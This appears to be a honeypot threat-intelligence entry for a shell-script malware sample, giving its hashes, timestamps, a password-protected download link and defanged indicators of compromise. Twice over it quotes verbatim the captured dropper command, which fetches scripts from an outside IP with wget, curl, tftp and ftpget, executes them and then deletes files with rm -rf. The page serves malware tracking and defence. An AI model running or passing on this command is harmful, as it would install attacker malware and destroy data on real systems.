Back to Malware Drops
f29c23e3ce0a393d9cd5927b4873e8b9a4a8800e4a1270abfd8f279ae4041729
MD54f824e050493f0ada9253977d59769ec
SSDEEP—
File Typetext/x-script
Size954 B
Sources2
Downloads0
First SeenJul 27, 2026
Last SeenJul 27, 2026
Download sample (.zip, password: infected)
Live malware — handle only in an isolated analysis environment.
Originating Attacks
Honeypot sessions that dropped this sample. Drop URLs are defanged; commands are shown verbatim and are not links.
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.56.209.153/nz.sh; curl -O http://31.56.209.153/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 31.56.209.153 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 31.56.209.153; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 31.56.209.153 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *Jul 27, 2026, 1:35:01 AMView attack sessioncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://31.56.209.153/nz.sh; curl -O http://31.56.209.153/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 31.56.209.153 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 31.56.209.153; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 31.56.209.153 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *Jul 27, 2026, 1:30:31 AMView attack session
Indicators of Compromise
Values are defanged (e.g. hxxp://, [.]) — not live links.
ipv4 (1)
- 31[.]56[.]209[.]153
url (5)
- hxxp://31[.]56[.]209[.]153/nz/nz[.]i686;
- hxxp://31[.]56[.]209[.]153/nz/nz[.]mips;
- hxxp://31[.]56[.]209[.]153/nz/nz[.]mpsl;
- hxxp://31[.]56[.]209[.]153/nz/nz[.]x86;
- hxxp://31[.]56[.]209[.]153/nz/nz[.]x86_64;